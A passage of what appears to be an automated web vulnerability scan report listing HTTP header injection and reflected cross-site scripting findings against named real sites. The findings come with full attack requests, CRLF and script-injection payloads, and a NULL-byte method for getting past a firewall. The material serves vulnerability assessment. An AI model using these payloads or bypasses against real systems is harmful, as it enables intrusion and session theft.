<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
<a href='http://sorgalla.com/tag/xpath/' class='tag-link-26' title='1 Thema' style='font-size: 8pt;'>
...[SNIP]...

4. HTTP header injection
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://18.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://18.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8f669%0d%0a0e49f1068d4 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=134&camp=8206&affcode=kw20564&inhURL=&cid=6850998613&networkType=search&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225548374%3B49327377%3Bv%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc110298/8f669%0d%0a0e49f1068d4/x22 HTTP/1.1
Host: 18.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:15:13 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=0c7def07-120f-fd49-cb9f-00001824d995; expires=Mon, 01-Aug-2011 13:15:13 GMT; path=/; domain=.xg4ken.com
Location: http://ad.doubleclick.net/clk;225548374;49327377;v?https://www.ally.com/index.html?CP=ppc110298/8f669
0e49f1068d4
/x22
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


4.2. http://ad.uk.doubleclick.net/activity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload bfed0%0d%0aff541864603 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /bfed0%0d%0aff541864603;src=1197321;type=barcl676;cat=acces951;ord=1;num=4100466468371.4507? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://apps.barclays.co.uk/accessibility/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/bfed0
ff541864603
;src=1197321;type=barcl676;cat=acces951;ord=1;num=4100466468371.4507:
Date: Tue, 03 May 2011 10:22:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://topics.nytimes.com/top/news/business/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/business/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 88682%0d%0a12518bf15fb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/88682%0d%0a12518bf15fb/business/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 03 May 2011 13:27:24 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/88682
12518bf15fb
/business/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

4.4. http://topics.nytimes.com/top/news/business/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/business/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ce975%0d%0a9d5ccac3422 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/news/ce975%0d%0a9d5ccac3422/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 03 May 2011 13:27:25 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/ce975
9d5ccac3422
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

5. Cross-site scripting (reflected)
There are 172 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://api.bing.com/qsonhs.aspx [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 9c261<img%20src%3da%20onerror%3dalert(1)>928548c3ce7 was submitted in the q parameter. This input was echoed as 9c261<img src=a onerror=alert(1)>928548c3ce7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPIW&q=9c261<img%20src%3da%20onerror%3dalert(1)>928548c3ce7 HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=banking+thailand&go=&form=QBLH&qs=n&sk=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=A5ECB6861B6147E494B4E63F96A0AFF8&CW=1043&CH=903&bIm=529

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 0e61084fc4fc4301ba28fec5e52577bc
Date: Tue, 03 May 2011 13:14:26 GMT
Connection: close

{"AS":{"Query":"9c261<img src=a onerror=alert(1)>928548c3ce7","FullResults":1}}

5.2. http://bits.wikimedia.org/en.wikipedia.org/load.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bits.wikimedia.org
Path:   /en.wikipedia.org/load.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 706e8<script>alert(1)</script>4b7a05ba12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en.wikipedia.org/load.php706e8<script>alert(1)</script>4b7a05ba12?debug=false&lang=en&modules=site&only=styles&skin=vector HTTP/1.1
Host: bits.wikimedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12wm1
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/w/load.php706e8<script>alert(1)</script>4b7a05ba12?debug=false&lang=en&modules=site&only=styles&skin=vector
Content-Type: text/html; charset=utf-8
Content-Length: 5760
Date: Tue, 03 May 2011 11:44:30 GMT
X-Varnish: 1814098367
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/w/load.php706e8&lt;scrip
...[SNIP]...
<p style="font-weight: bold;">To check for "load.php706e8<script>alert(1)</script>4b7a05ba12?debug=false&lang=en&modules=site&only=styles&skin=vector" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/load.php706e8<script>
...[SNIP]...

5.3. http://bits.wikimedia.org/en.wikipedia.org/load.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bits.wikimedia.org
Path:   /en.wikipedia.org/load.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d914f"><script>alert(1)</script>36c1e35431d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en.wikipedia.org/load.phpd914f"><script>alert(1)</script>36c1e35431d?debug=false&lang=en&modules=site&only=styles&skin=vector HTTP/1.1
Host: bits.wikimedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12wm1
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/w/load.phpd914f"><script>alert(1)</script>36c1e35431d?debug=false&lang=en&modules=site&only=styles&skin=vector
Content-Type: text/html; charset=utf-8
Content-Length: 5794
Date: Tue, 03 May 2011 11:44:29 GMT
X-Varnish: 1814097658
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/w/load.phpd914f&quot;&gt
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/load.phpd914f"><script>alert(1)</script>36c1e35431d?debug=false&lang=en&modules=site&only=styles&skin=vector" title="Wikipedia:load.phpd914f">
...[SNIP]...

5.4. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.wikipedia.org
Path:   /wiki/Liste_der_Banken_in_Thailand

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0058e56"><script>alert(1)</script>9a9eef19ccb was submitted in the REST URL parameter 2. This input was echoed as 58e56"><script>alert(1)</script>9a9eef19ccb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Liste_der_Banken_in_Thailand%0058e56"><script>alert(1)</script>9a9eef19ccb HTTP/1.1
Host: de.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:20:18 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=de.wikipedia.org loc=/wiki/Liste_der_Banken_in_Thailand%0058e56"><script>alert(1)</script>9a9eef19ccb
Content-Length: 5564
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:3128
X-Cache: MISS from sq77.wikimedia.org
X-Cache-Lookup: MISS from sq77.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://de.wikipedia.org/wiki/Liste_der_Banken_in
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/Liste_der_Banken_in_Thailand%0058e56"><script>alert(1)</script>9a9eef19ccb" title="Wikipedia:Liste_der_Banken_in_Thailand%0058e56">
...[SNIP]...

5.5. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.wikipedia.org
Path:   /wiki/Liste_der_Banken_in_Thailand

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00c5794<script>alert(1)</script>bb4f084c467 was submitted in the REST URL parameter 2. This input was echoed as c5794<script>alert(1)</script>bb4f084c467 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Liste_der_Banken_in_Thailand%00c5794<script>alert(1)</script>bb4f084c467 HTTP/1.1
Host: de.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:20:25 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=de.wikipedia.org loc=/wiki/Liste_der_Banken_in_Thailand%00c5794<script>alert(1)</script>bb4f084c467
Content-Length: 5536
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq66.wikimedia.org
X-Cache-Lookup: MISS from sq66.wikimedia.org:3128
X-Cache: MISS from sq39.wikimedia.org
X-Cache-Lookup: MISS from sq39.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://de.wikipedia.org/wiki/Liste_der_Banken_in
...[SNIP]...
<p style="font-weight: bold;">To check for "Liste_der_Banken_in_Thailand%00c5794<script>alert(1)</script>bb4f084c467" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/Liste_der_Banken_in_Thailand%00c5794<script>
...[SNIP]...

5.6. http://ds.addthis.com/red/psi/sites/marketdata.set.or.th/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/marketdata.set.or.th/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8084c<script>alert(1)</script>1d5476c394a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/marketdata.set.or.th/p.json?callback=_ate.ad.hpr8084c<script>alert(1)</script>1d5476c394a&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fmarketdata.set.or.th%2Fmkt%2Ftopten.do%3Flanguage%3Den%26country%3DUS&ref=http%3A%2F%2Fwww.set.or.th%2Fen%2Fsitemap%2Ffor_listing.html&d8del7 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
Cookie: uid=4dc048d9159e4ae3; uit=1; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1304431085.1FE|1304431085.1OD|1304431085.60

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 03 May 2011 14:06:49 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 02 Jun 2011 14:06:49 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 03 May 2011 14:06:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 14:06:49 GMT
Connection: close

_ate.ad.hpr8084c<script>alert(1)</script>1d5476c394a({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.7. http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.set.or.th/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 34fe0<script>alert(1)</script>b7028b6fd8d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.set.or.th/p.json?callback=_ate.ad.hpr34fe0<script>alert(1)</script>b7028b6fd8d&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.set.or.th%2Fen%2Fregulations%2Fcg%2Froles_p1.html&ref=http%3A%2F%2Fwww.set.or.th%2Fen%2Findex.html&zu5tb1 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
Cookie: uid=4dc048d9159e4ae3; uit=1; psc=4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 473
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 03 May 2011 13:58:06 GMT; Path=/
Set-Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; Domain=.addthis.com; Expires=Mon, 01 Aug 2011 13:58:06 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 02 Jun 2011 13:58:06 GMT; Path=/
Set-Cookie: di=%7B%7D..1304431086.1FE|1304431086.1OD|1304431086.60; Domain=.addthis.com; Expires=Thu, 02-May-2013 02:39:07 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 03 May 2011 13:58:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:58:06 GMT
Connection: close

_ate.ad.hpr34fe0<script>alert(1)</script>b7028b6fd8d({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbser
...[SNIP]...

5.8. http://edge.aperture.displaymarketplace.com/displayscript.js [PageID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /displayscript.js

Issue detail

The value of the PageID request parameter is copied into the HTML document as plain text between tags. The payload 4a5ea<script>alert(1)</script>b28d747a326 was submitted in the PageID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=274a5ea<script>alert(1)</script>b28d747a326 HTTP/1.1
Host: edge.aperture.displaymarketplace.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Server: D2C.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/javascript; charset=utf-8
Content-Length: 14932
Expires: Tue, 03 May 2011 13:33:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:33:02 GMT
Connection: close
Set-Cookie: mpackc=v1^1016|1234|2175; domain=displaymarketplace.com; expires=Fri, 03-May-2013 13:32:59 GMT; path=/

if (liveCon_ClientID === undefined)// && datran_ClientID === undefined)
{
   var liveCon_ClientID = 4157529279552;
}

//-----------------Helper Methods----------------------

function liveCon_Get
...[SNIP]...
com/pagead/conversion/1045272592/?label=qj0kCNDh2gEQkLC28gM&amp;guid=ON&amp;script=0");
liveCon_LoadImage("http://aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&pageID=274a5ea<script>alert(1)</script>b28d747a326&eventType=view");
liveCon_LoadImage("http://edge.aperture.displaymarketplace.com/exl.gif?initdb=1");
liveCon_LoadImage("http://adadvisor.net/adscores/s.pixel?sid=9110517187&_md5=&_fromss=0&code=");
...[SNIP]...

5.9. http://en.wikipedia.org/w/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.wikipedia.org
Path:   /w/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006a3ca"><a>09100c96293 was submitted in the REST URL parameter 1. This input was echoed as 6a3ca"><a>09100c96293 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /w%006a3ca"><a>09100c96293/index.php?title=MediaWiki:JQuery-makeCollapsible.js&action=raw&ctype=text/javascript HTTP/1.1
Host: en.wikipedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: clicktracking-session=Azl5D3ckV95i4uJietKetOWelKAgEVii3

Response (redirected)

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:05 GMT
Server: Apache
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/w%006a3ca"><a>09100c96293/index.php?title=MediaWiki:JQuery-makeCollapsible.js&action=raw&ctype=text/javascript
Content-Length: 5784
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: MISS from sq76.wikimedia.org:3128
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: MISS from sq73.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://en.wikipedia.org/wiki/w%006a3ca&quot;&gt;
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/w%006a3ca"><a>09100c96293/index.php?title=MediaWiki:JQuery-makeCollapsible.js&action=raw&ctype=text/javascript" title="Wikipedia:w%006a3ca">
...[SNIP]...

5.10. http://en.wikipedia.org/w/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /w/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ccdf<script>alert(1)</script>41a51be8def was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /w/index.php5ccdf<script>alert(1)</script>41a51be8def?action=raw&ctype=text/css&title=MediaWiki%3AJQuery-makeCollapsible.css HTTP/1.1
Host: en.wikipedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: clicktracking-session=Azl5D3ckV95i4uJietKetOWelKAgEVii3

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:07 GMT
Server: Apache
Cache-Control: s-maxage=2678400, max-age=2678400
